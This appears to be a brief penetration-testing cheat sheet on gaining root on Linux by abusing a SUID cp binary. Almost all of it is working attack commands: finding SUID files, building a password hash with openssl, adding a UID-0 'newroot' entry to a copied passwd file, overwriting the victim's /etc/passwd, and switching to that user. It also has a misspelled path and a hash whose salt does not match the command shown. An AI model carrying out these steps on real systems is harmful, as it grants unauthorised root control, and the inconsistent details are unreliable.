CP SUID
CP SUID
check SUID find / -perm -u=s -type f 2>/dev/null
If cp is there , go ahead
On victim, cat /etc/apsswd ,
on attacker, nano passwd , and paste data from victim
create salt value of password pass123 for newroot user openssl passwd -1 -salt newroot pass123 value = $1$ignite$3eTbJm98O9Hz.k1NTdNxe1
add a new line in passwd file newroot:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
Transfer file to victim
cp passwd /etc/passwd
su newroot
Last updated